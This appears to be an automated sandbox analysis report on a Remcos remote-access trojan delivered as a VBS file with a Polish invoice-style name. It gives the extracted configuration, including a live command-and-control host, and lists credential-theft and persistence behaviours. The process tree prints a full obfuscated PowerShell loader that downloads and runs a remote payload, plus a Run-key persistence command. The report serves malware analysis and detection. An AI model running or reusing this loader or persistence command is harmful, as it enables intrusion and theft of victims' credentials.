Overview

overview

10

Static

static

1

MPOL_74836...24.vbs

windows7-x64

6

MPOL_74836...24.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    136s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-10-2024 10:53

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    MPOL_74836582 Zapytanie Potwierdzenie 003424.vbs

  • Size

    7KB

  • MD5

    a74cf7fea2f317f537fadc3e2d34dee5

  • SHA1

    1df8410433bba83aa58596cd88a9c084a5a8e43a

  • SHA256

    c0d20c1324c32ec11ee40a892c6ae0b954f6972e19ce9e976bcf565091f12cdd

  • SHA512

    ea1505953b80b96b450bc0cda83a1c3bd3001f057a874bce22646cd7ade2b4ed8fe39cff208255cb84eb60a931a3d73164d7ab05f7fee795bbbae4f5b82caa68

  • SSDEEP

    192:8K9O+aSHwmoFMKNdYggfJtvK5I76yDP8Te:LaSHOFHNdYvu586dy

Score
10/10
remcosremotehostcollectiondiscoveryexecutionpersistencerat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

dumboi.duckdns.org:51525

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-8AXK3L

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 6 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
    collection
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\MPOL_74836582 Zapytanie Potwierdzenie 003424.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:404
    • C:\Windows\System32\cmd.exe
      cmd.exe /c ping aszzzw_6777.6777.6777.677e
      2⤵
      • System Network Configuration Discovery: Internet Connection Discovery
      • Suspicious use of WriteProcessMemory
      PID:1776
      • C:\Windows\system32\PING.EXE
        ping aszzzw_6777.6777.6777.677e
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:3720
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Svigagtige dimerised Oprettelsesdokumenter Rhinodynia Zetas #>;$Desiringly147='Grunted';<#Iltelegrammet Hemispheral Acromelalgia Deboshed Corruptibleness #>;$Masonically=$Nervepatientens+$host.UI;If ($Masonically) {$Laengst++;}function Jus($Hovekatalogers){$Saneringsmodent=$Skrmplante+$Hovekatalogers.'Length'-$Laengst; for( $Isttes=4;$Isttes -lt $Saneringsmodent;$Isttes+=5){$Skovsvinerier++;$Snrer210+=$Hovekatalogers[$Isttes];$Skuebrdene='Kundemdets';}$Snrer210;}function Hyperromanticism140($Regelfaststtelsers){ & ($Andantinoer) ($Regelfaststtelsers);}$Courtezanry=Jus ' owlMBov.o Unlz R niFluslDiasl AnoaDay /Non. ';$Courtezanry+=Jus ' ad5Thro. Ska0 Adr Dece(Is.aWRotaiInvanRad.dBracoGawaw M,rsFren Ch,pNOndsT,til Rose1Skr,0Ungd. B t0Ig,i;Str ParWNoneiTra nFar,6Krem4S,je; Ber Mot x Ka.6S,at4Ha,l;Cykl BaghrAfstv itr: Hol1 All3 it1 or.Fugl0 ava)Stri FyriGStegeGenocOmgakIgnao rre/As p2Depr0 Mis1calc0 Spo0Penk1side0 Enf1Retr WeapFPropiLaserRemoe,kolfLiv,oBarbxBlu /Unf.1Pol,3 Unf1utrn. mb0Bade ';$Retspraksisens=Jus 'KariU,rivsPhyteLet.rtana-Unfra StygSmmeeBorgNTil TBlac ';$Miljforandringers=Jus 'LegahUnivtenketKloapStats boo:Recu/Ergo/gae,gsolboHyd vFolkaHumel RatlMahocFati.SerpoPaasrPitagBibe/R gnrBegae ird DefnSta iSamfnTo lgEners IndbF rsl.tatt .ydeTr lr idtnM,dheCervs oma.Sou.aAsylsCan iOstr ';$Croises=Jus ' ,kr>Nerv ';$Andantinoer=Jus ' ResIAnamESo iXViva ';$Befogging='Italiana';$Recarbon='\Arkaiserings.Slg';Hyperromanticism140 (Jus 'Forh$ empgPr,clAg eofrueBOms.AM.nolOver:NiveA pidnVagta ispCThyrl DisiFrihsSegriOu,dsKnu,1Vrkb4E gl7,arv=A ab$ s eE.uniNCog VAnt :Ae iaForfpTeraPKer dNoncaConttWienAluge+Arv,$,ambrStteeExcuc issAkontr S,kb MayoWeasNStub ');Hyperromanticism140 (Jus ' hec$DefeG Ln Lr ckONonaB ForaTe.eLBrn :GenoAGrafuAlleT MulOSa.se Co.T SvrtRuboE Bra= P s$UnsoM ShaiEme.LStyrjNulsfAarro M,mrdoryASyndn InbDAnlirSpe,iNasaN KomG VodeyustRInflS Spy.Sprjs xaP SmrlVa dIBisetSub (Well$ PeacJeweRRetso S,di NitsEsseEUpshsSydv)Arb ');Hyperromanticism140 (Jus 'Ndp [Cyc n.ndiEOothT S,j.Ger.sskovEUd frRespvProhI U fCfedteSalvPPhylOSan.i Op.nS.orT antmSpilaFjolN lauaR liGUprue ChoRTuli]W nn:t.ed:Ansts heeBageCisskU MyorHeltI rustUrotyUdviPSc dr.ygaOUndstOro.O CryC idO talLHove Da a=Steg Kaff[H moNBesgETutotBird. ebySGerfEUni CSweauDyserOverIHomoT Picy,efrpLnkorUdstoMaantBiltORomaCafs.oC holCondTKavey KolPRdtue S,e]Tui :Hypo:smalTamucLKo ps N n1Nond2 Dep ');$Miljforandringers=$Autoette[0];$Panspermic=(Jus 'R od$Trepg alaLU.caoElecBEuryaGsteLFisk:spidTBstrEKloasGruntHikkUBeelD FesSUdskKC ieRUdp iSv.jvUalmN Madi CebnStruGPoinSW.ntf TraAfredcVindI mpelgr nIO det Unoe PretMeine.urunAmph=UzbenneoneBolsWSlen- AtmOmaliBCaatjSekaeKr mcAartTDimi .eadS ilYBlabSAfstTAsseeYallM Vrd.TripN Chee Sert ask.assuwTrameWoo.bFodecO chlPeroISp aeUd,anVasotThie ');Hyperromanticism140 ($Panspermic);Hyperromanticism140 (Jus 'Terp$NeksT Gr,eLydssU.ostPotpu OvedStabs supkJuntr SemiGearvMedln icri Skon tupg riss Pasf TilaMisecHemaiStatlpeaciWaistTempeBanktKr.peInexnEvin.U.reHStraeS,orahelmdPluseKanarArvesNyru[Scyl$kallRBetueToi t Ni sTrenpDigirS,igaCr skOl es lluiLinas Mo.esmagnKni.sUnde]Unib= D c$PilaC emaofolluSubvrMuditdisteSk rzRatiaKaninBortrB riylogi ');$Quickwittedness=Jus 'Reto$ VreTJordeNortsUncotUdspulitodFluesRea kJacor B ti MelvDirenInd,iNon,n resgLkkesWin f indamesac Snoitr nlBilliPlebtgenfe PertFasce BranLade.P eaDWal o BhiwVestnPurbl SkioAnsaaTricdPavoFAndriSvinlundeeMil (Ital$kro MAggriStrklKulmjPitcf Ru oViv rIndraO ryn AvldDr,jrPantiOpstnAarpg.erse inor upes Sam,xero$ BadGDiluo kvac SnnaRe drEskit oli2A.ea1Unde9Slvs) For ';$Gocart219=$Anaclisis147;Hyperromanticism140 (Jus ' ff$Epidg Bo lTom o PlabBaj,ARaadLFals:SukksPietuSojabJun.lUnb A.emiPLovlS d,ba HyprBaadYMats= ona(DiviTPutaE.envSG lit Ind-hundPDigraAmelt ElchUnke Ra i$SkipgIngaOOverc,choaScherUdaatGens2 uni1 Sha9 Ce ) Nu. ');while (!$Sublapsary) {Hyperromanticism140 (Jus 'Lo a$Can g.onilmidto Ydeb Ko.akautlTr d:BefjNWin,oen onSen.fTusioC,acc TilaOverl e r= Spe$Fo otOctarEquiuThriemed, ') ;Hyperromanticism140 $Quickwittedness;Hyperromanticism140 (Jus 'BullsFairt StrAF.reRArzaTOpha-TofasGru.LToruECha ERa rpAnn. Lope4 An ');Hyperromanticism140 (Jus ' Reg$Acetg loL R sONoncB RygAObumlhaar:AndeSTesku St BEposLPs.ca MenpUnhaS UdpaL vnREnviy Bac= Emb(So,ttTimbegerisN nptMinu- JivPBilmaSomntBaraHBeda Luk $Tov GTeksoW,pec UndaChe rLa,dT Boy2 Gle1Dejk9Cant)C st ') ;Hyperromanticism140 (Jus ' Whi$DgnkG afnl nsloLatebSvarA Worl Uno:GaloBIntiATwy g ystSPrehV tmmRDiffdAutoS ont=Sklr$ splG Fabl olOScrab ThaaMesilFe n: AmiF Rugh PolOPrevvCouneLledddameeHoicr DraNAcclE ins+Grin+.ava% pti$Espaa lyuGnu T ilobagse ClotRewiTStoreBray.EpigCStoroLatou DisNMemotCirc ') ;$Miljforandringers=$Autoette[$Bagsvrds];}$Turpentiny251=324334;$Oxalsyre=30504;Hyperromanticism140 (Jus 'Ryst$sk pGLydiL DisODistBProsA RetLGuil:,eliTOverotiltg TeerLandEMedlVUnatITrfssId moT umRgg dSEnc plej= A.k MaiG meteBro,TOpio-UncrcAnt.oQui N Kortka kESt,lNSto tpari Ga m$TeleGGenvo Bu C L vaCharr Lret rdi2Inco1 I,f9 Omn ');Hyperromanticism140 (Jus ' Bi $TomagPrecl bllo verbForlaExstl sp :ove T punrminuaThicuFlyvm IntaT.kkt nsaiSlagsUo mqStipxGyrerRo c ,ob=Rota Gale[TotaSToway AnpsUd nt,kateDig mFors.TilrC Homo.ixenScenvhoppe Fo rStubtBra.]axwe: se,:FagkFMajdr Do oDag mOb uB StaaVests ombeLrk 6Pebr4WaspS oystbyudrInfui.rnin QuigSubv( cap$ T.sTChevoFo.vgBewar ,moe ekvvInauiI.nosGed o ElerGaars,cor)Top ');Hyperromanticism140 (Jus ' Vul$D,ttG RoulRe aOReteBOmryAFavolTffe: DiaKDefaOPlseNBio tVal r KonaUndes SphtForusLazy Mano= Ej ,att[einaS relYGnidSWatetSy tEByggMTra .NedttneddeUvenX ablTRe n.IntreTrannBlokcFutuoP pidGieniFinan NedgBrud]Eugl:Wo,k:Frgna etsS,ltcSup,iSquaiSa b.Skurg Shie MelTR.crs Po T RetRBalaILendnA,agGCocc(H ds$Ove tvgtfrPjataIntrUDrnrM,ladaInsttFlueI Uf S utaQR diXHer,rH bn)Sing ');Hyperromanticism140 (Jus ' uns$unexgSuprl.pigoSub.BIn eaMe mLKase:JordbAurei Ag.mParlAnomiNFloga In,= Out$SimuKSowaOStrin TraTDorirA tia O.ts,esttP raSPaas.PerssIndiUK ffbLsagsScantDec.RNatuILambnfortGPr m(B.su$no ctBea,uP tcRSeecpLinjeA ronMiddt.haii SygNSeksyL wn2Forg5Subf1M rm, ye$Met,oB,stXdag AGipslMitosPteryKolorEr.aE For) iro ');Hyperromanticism140 $bimana;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2116
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Svigagtige dimerised Oprettelsesdokumenter Rhinodynia Zetas #>;$Desiringly147='Grunted';<#Iltelegrammet Hemispheral Acromelalgia Deboshed Corruptibleness #>;$Masonically=$Nervepatientens+$host.UI;If ($Masonically) {$Laengst++;}function Jus($Hovekatalogers){$Saneringsmodent=$Skrmplante+$Hovekatalogers.'Length'-$Laengst; for( $Isttes=4;$Isttes -lt $Saneringsmodent;$Isttes+=5){$Skovsvinerier++;$Snrer210+=$Hovekatalogers[$Isttes];$Skuebrdene='Kundemdets';}$Snrer210;}function Hyperromanticism140($Regelfaststtelsers){ & ($Andantinoer) ($Regelfaststtelsers);}$Courtezanry=Jus ' owlMBov.o Unlz R niFluslDiasl AnoaDay /Non. ';$Courtezanry+=Jus ' ad5Thro. Ska0 Adr Dece(Is.aWRotaiInvanRad.dBracoGawaw M,rsFren Ch,pNOndsT,til Rose1Skr,0Ungd. B t0Ig,i;Str ParWNoneiTra nFar,6Krem4S,je; Ber Mot x Ka.6S,at4Ha,l;Cykl BaghrAfstv itr: Hol1 All3 it1 or.Fugl0 ava)Stri FyriGStegeGenocOmgakIgnao rre/As p2Depr0 Mis1calc0 Spo0Penk1side0 Enf1Retr WeapFPropiLaserRemoe,kolfLiv,oBarbxBlu /Unf.1Pol,3 Unf1utrn. mb0Bade ';$Retspraksisens=Jus 'KariU,rivsPhyteLet.rtana-Unfra StygSmmeeBorgNTil TBlac ';$Miljforandringers=Jus 'LegahUnivtenketKloapStats boo:Recu/Ergo/gae,gsolboHyd vFolkaHumel RatlMahocFati.SerpoPaasrPitagBibe/R gnrBegae ird DefnSta iSamfnTo lgEners IndbF rsl.tatt .ydeTr lr idtnM,dheCervs oma.Sou.aAsylsCan iOstr ';$Croises=Jus ' ,kr>Nerv ';$Andantinoer=Jus ' ResIAnamESo iXViva ';$Befogging='Italiana';$Recarbon='\Arkaiserings.Slg';Hyperromanticism140 (Jus 'Forh$ empgPr,clAg eofrueBOms.AM.nolOver:NiveA pidnVagta ispCThyrl DisiFrihsSegriOu,dsKnu,1Vrkb4E gl7,arv=A ab$ s eE.uniNCog VAnt :Ae iaForfpTeraPKer dNoncaConttWienAluge+Arv,$,ambrStteeExcuc issAkontr S,kb MayoWeasNStub ');Hyperromanticism140 (Jus ' hec$DefeG Ln Lr ckONonaB ForaTe.eLBrn :GenoAGrafuAlleT MulOSa.se Co.T SvrtRuboE Bra= P s$UnsoM ShaiEme.LStyrjNulsfAarro M,mrdoryASyndn InbDAnlirSpe,iNasaN KomG VodeyustRInflS Spy.Sprjs xaP SmrlVa dIBisetSub (Well$ PeacJeweRRetso S,di NitsEsseEUpshsSydv)Arb ');Hyperromanticism140 (Jus 'Ndp [Cyc n.ndiEOothT S,j.Ger.sskovEUd frRespvProhI U fCfedteSalvPPhylOSan.i Op.nS.orT antmSpilaFjolN lauaR liGUprue ChoRTuli]W nn:t.ed:Ansts heeBageCisskU MyorHeltI rustUrotyUdviPSc dr.ygaOUndstOro.O CryC idO talLHove Da a=Steg Kaff[H moNBesgETutotBird. ebySGerfEUni CSweauDyserOverIHomoT Picy,efrpLnkorUdstoMaantBiltORomaCafs.oC holCondTKavey KolPRdtue S,e]Tui :Hypo:smalTamucLKo ps N n1Nond2 Dep ');$Miljforandringers=$Autoette[0];$Panspermic=(Jus 'R od$Trepg alaLU.caoElecBEuryaGsteLFisk:spidTBstrEKloasGruntHikkUBeelD FesSUdskKC ieRUdp iSv.jvUalmN Madi CebnStruGPoinSW.ntf TraAfredcVindI mpelgr nIO det Unoe PretMeine.urunAmph=UzbenneoneBolsWSlen- AtmOmaliBCaatjSekaeKr mcAartTDimi .eadS ilYBlabSAfstTAsseeYallM Vrd.TripN Chee Sert ask.assuwTrameWoo.bFodecO chlPeroISp aeUd,anVasotThie ');Hyperromanticism140 ($Panspermic);Hyperromanticism140 (Jus 'Terp$NeksT Gr,eLydssU.ostPotpu OvedStabs supkJuntr SemiGearvMedln icri Skon tupg riss Pasf TilaMisecHemaiStatlpeaciWaistTempeBanktKr.peInexnEvin.U.reHStraeS,orahelmdPluseKanarArvesNyru[Scyl$kallRBetueToi t Ni sTrenpDigirS,igaCr skOl es lluiLinas Mo.esmagnKni.sUnde]Unib= D c$PilaC emaofolluSubvrMuditdisteSk rzRatiaKaninBortrB riylogi ');$Quickwittedness=Jus 'Reto$ VreTJordeNortsUncotUdspulitodFluesRea kJacor B ti MelvDirenInd,iNon,n resgLkkesWin f indamesac Snoitr nlBilliPlebtgenfe PertFasce BranLade.P eaDWal o BhiwVestnPurbl SkioAnsaaTricdPavoFAndriSvinlundeeMil (Ital$kro MAggriStrklKulmjPitcf Ru oViv rIndraO ryn AvldDr,jrPantiOpstnAarpg.erse inor upes Sam,xero$ BadGDiluo kvac SnnaRe drEskit oli2A.ea1Unde9Slvs) For ';$Gocart219=$Anaclisis147;Hyperromanticism140 (Jus ' ff$Epidg Bo lTom o PlabBaj,ARaadLFals:SukksPietuSojabJun.lUnb A.emiPLovlS d,ba HyprBaadYMats= ona(DiviTPutaE.envSG lit Ind-hundPDigraAmelt ElchUnke Ra i$SkipgIngaOOverc,choaScherUdaatGens2 uni1 Sha9 Ce ) Nu. ');while (!$Sublapsary) {Hyperromanticism140 (Jus 'Lo a$Can g.onilmidto Ydeb Ko.akautlTr d:BefjNWin,oen onSen.fTusioC,acc TilaOverl e r= Spe$Fo otOctarEquiuThriemed, ') ;Hyperromanticism140 $Quickwittedness;Hyperromanticism140 (Jus 'BullsFairt StrAF.reRArzaTOpha-TofasGru.LToruECha ERa rpAnn. Lope4 An ');Hyperromanticism140 (Jus ' Reg$Acetg loL R sONoncB RygAObumlhaar:AndeSTesku St BEposLPs.ca MenpUnhaS UdpaL vnREnviy Bac= Emb(So,ttTimbegerisN nptMinu- JivPBilmaSomntBaraHBeda Luk $Tov GTeksoW,pec UndaChe rLa,dT Boy2 Gle1Dejk9Cant)C st ') ;Hyperromanticism140 (Jus ' Whi$DgnkG afnl nsloLatebSvarA Worl Uno:GaloBIntiATwy g ystSPrehV tmmRDiffdAutoS ont=Sklr$ splG Fabl olOScrab ThaaMesilFe n: AmiF Rugh PolOPrevvCouneLledddameeHoicr DraNAcclE ins+Grin+.ava% pti$Espaa lyuGnu T ilobagse ClotRewiTStoreBray.EpigCStoroLatou DisNMemotCirc ') ;$Miljforandringers=$Autoette[$Bagsvrds];}$Turpentiny251=324334;$Oxalsyre=30504;Hyperromanticism140 (Jus 'Ryst$sk pGLydiL DisODistBProsA RetLGuil:,eliTOverotiltg TeerLandEMedlVUnatITrfssId moT umRgg dSEnc plej= A.k MaiG meteBro,TOpio-UncrcAnt.oQui N Kortka kESt,lNSto tpari Ga m$TeleGGenvo Bu C L vaCharr Lret rdi2Inco1 I,f9 Omn ');Hyperromanticism140 (Jus ' Bi $TomagPrecl bllo verbForlaExstl sp :ove T punrminuaThicuFlyvm IntaT.kkt nsaiSlagsUo mqStipxGyrerRo c ,ob=Rota Gale[TotaSToway AnpsUd nt,kateDig mFors.TilrC Homo.ixenScenvhoppe Fo rStubtBra.]axwe: se,:FagkFMajdr Do oDag mOb uB StaaVests ombeLrk 6Pebr4WaspS oystbyudrInfui.rnin QuigSubv( cap$ T.sTChevoFo.vgBewar ,moe ekvvInauiI.nosGed o ElerGaars,cor)Top ');Hyperromanticism140 (Jus ' Vul$D,ttG RoulRe aOReteBOmryAFavolTffe: DiaKDefaOPlseNBio tVal r KonaUndes SphtForusLazy Mano= Ej ,att[einaS relYGnidSWatetSy tEByggMTra .NedttneddeUvenX ablTRe n.IntreTrannBlokcFutuoP pidGieniFinan NedgBrud]Eugl:Wo,k:Frgna etsS,ltcSup,iSquaiSa b.Skurg Shie MelTR.crs Po T RetRBalaILendnA,agGCocc(H ds$Ove tvgtfrPjataIntrUDrnrM,ladaInsttFlueI Uf S utaQR diXHer,rH bn)Sing ');Hyperromanticism140 (Jus ' uns$unexgSuprl.pigoSub.BIn eaMe mLKase:JordbAurei Ag.mParlAnomiNFloga In,= Out$SimuKSowaOStrin TraTDorirA tia O.ts,esttP raSPaas.PerssIndiUK ffbLsagsScantDec.RNatuILambnfortGPr m(B.su$no ctBea,uP tcRSeecpLinjeA ronMiddt.haii SygNSeksyL wn2Forg5Subf1M rm, ye$Met,oB,stXdag AGipslMitosPteryKolorEr.aE For) iro ');Hyperromanticism140 $bimana;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:5084
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:208
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Strandretter" /t REG_EXPAND_SZ /d "%Indifferentes% -windowstyle 1 $Fravnningerne=(gp -Path 'HKCU:\Software\Brugerfilers\').Udstillingslokaler;%Indifferentes% ($Fravnningerne)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:812
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Strandretter" /t REG_EXPAND_SZ /d "%Indifferentes% -windowstyle 1 $Fravnningerne=(gp -Path 'HKCU:\Software\Brugerfilers\').Udstillingslokaler;%Indifferentes% ($Fravnningerne)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:1832
      • C:\Windows\SysWOW64\msiexec.exe
        C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\nghcofxxdiukfuz"
        3⤵
          PID:2068
        • C:\Windows\SysWOW64\msiexec.exe
          C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\nghcofxxdiukfuz"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:4332
        • C:\Windows\SysWOW64\msiexec.exe
          C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\yimvpyhrrqmphbnluit"
          3⤵
          • Accesses Microsoft Outlook accounts
          • System Location Discovery: System Language Discovery
          PID:3160
        • C:\Windows\SysWOW64\msiexec.exe
          C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\adznqqssfzebrpjpdtgpnl"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:764

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      1db6756a35a10ecb84bac2c318d626c7

      SHA1

      b010652f04e55d061898f64c23776647a98e7292

      SHA256

      30663e916a394b16bffe3ef9f7af8dbd3456c45c2c6d218bb25d18aee5807252

      SHA512

      7f8f5a133d6253ec619550763087d3992f883e851532ae97a8008ff496fbaac4d79bf2dd4a3a4bb69f52c16357a9f8afa50479c05757eb39e2639f2de5f6f173

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_izf5aqss.n0f.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\nghcofxxdiukfuz
      Filesize

      4KB

      MD5

      562a58578d6d04c7fb6bda581c57c03c

      SHA1

      12ab2b88624d01da0c5f5d1441aa21cbc276c5f5

      SHA256

      ff5c70287ba432a83f9015209d6e933462edca01d68c53c09882e1e4d22241c8

      SHA512

      3f6e19faa0196bd4c085defa587e664abdd63c25ef30df8f4323e60a5a5aca3cd2709466f772e64ab00fe331d4264841422d6057451947f3500e9252a132254e

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Arkaiserings.Slg
      Filesize

      462KB

      MD5

      435e0cd415d69ecb8a08c76fc8e4cd22

      SHA1

      e837dcf180638cd11ab879d23345d25b20f3730b

      SHA256

      9d776efef1a9250cf4791c7ce6134e70efb65b3fb495f3be6d0427b13516bbb5

      SHA512

      1199e5f2690d42c2bd57913eaa3ea69703b0e4dc5d8999d59cf940c5ed4fe72daa0d1d5f45d28ed532edfb4a3330e38417cb46ebbfba4d8f6a299b022962e4bd

      Download Submit

    • memory/208-72-0x000000001F490000-0x000000001F4A9000-memory.dmp

      Filesize

      100KB

      Download

    • memory/208-53-0x0000000000920000-0x0000000001B74000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/208-75-0x000000001F490000-0x000000001F4A9000-memory.dmp

      Filesize

      100KB

      Download

    • memory/208-76-0x000000001F490000-0x000000001F4A9000-memory.dmp

      Filesize

      100KB

      Download

    • memory/764-58-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

      Download

    • memory/764-64-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

      Download

    • memory/764-60-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

      Download

    • memory/2116-14-0x00007FFEF03A0000-0x00007FFEF0E61000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2116-12-0x00007FFEF03A0000-0x00007FFEF0E61000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2116-19-0x00007FFEF03A0000-0x00007FFEF0E61000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2116-0-0x00007FFEF03A3000-0x00007FFEF03A5000-memory.dmp

      Filesize

      8KB

      Download

    • memory/2116-10-0x000001E0AEE50000-0x000001E0AEE72000-memory.dmp

      Filesize

      136KB

      Download

    • memory/2116-13-0x00007FFEF03A3000-0x00007FFEF03A5000-memory.dmp

      Filesize

      8KB

      Download

    • memory/2116-11-0x00007FFEF03A0000-0x00007FFEF0E61000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3160-59-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

      Download

    • memory/3160-57-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

      Download

    • memory/3160-65-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

      Download

    • memory/4332-56-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

      Download

    • memory/4332-63-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

      Download

    • memory/4332-66-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

      Download

    • memory/4332-61-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

      Download

    • memory/5084-21-0x0000000005300000-0x0000000005928000-memory.dmp

      Filesize

      6.2MB

      Download

    • memory/5084-44-0x0000000008AA0000-0x00000000099D9000-memory.dmp

      Filesize

      15.2MB

      Download

    • memory/5084-42-0x00000000084F0000-0x0000000008A94000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/5084-41-0x0000000007280000-0x00000000072A2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/5084-40-0x00000000072E0000-0x0000000007376000-memory.dmp

      Filesize

      600KB

      Download

    • memory/5084-39-0x0000000006620000-0x000000000663A000-memory.dmp

      Filesize

      104KB

      Download

    • memory/5084-38-0x00000000078C0000-0x0000000007F3A000-memory.dmp

      Filesize

      6.5MB

      Download

    • memory/5084-37-0x00000000060B0000-0x00000000060FC000-memory.dmp

      Filesize

      304KB

      Download

    • memory/5084-36-0x0000000006080000-0x000000000609E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/5084-34-0x0000000005A90000-0x0000000005DE4000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/5084-24-0x00000000059A0000-0x0000000005A06000-memory.dmp

      Filesize

      408KB

      Download

    • memory/5084-23-0x0000000005240000-0x00000000052A6000-memory.dmp

      Filesize

      408KB

      Download

